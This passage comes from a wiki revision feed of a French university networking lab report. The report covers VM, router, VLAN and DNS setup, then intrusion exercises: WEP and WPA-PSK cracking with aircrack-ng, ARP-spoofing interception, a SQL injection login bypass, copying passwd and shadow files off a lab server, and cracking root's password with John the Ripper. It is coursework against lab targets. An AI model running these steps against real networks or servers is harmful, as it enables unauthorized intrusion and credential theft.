 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53679</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53679"/>
				<updated>2020-11-16T11:12:23Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Enfin nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net&lt;br /&gt;
 @       IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53118</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53118"/>
				<updated>2020-11-03T08:07:40Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* Tests d’intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
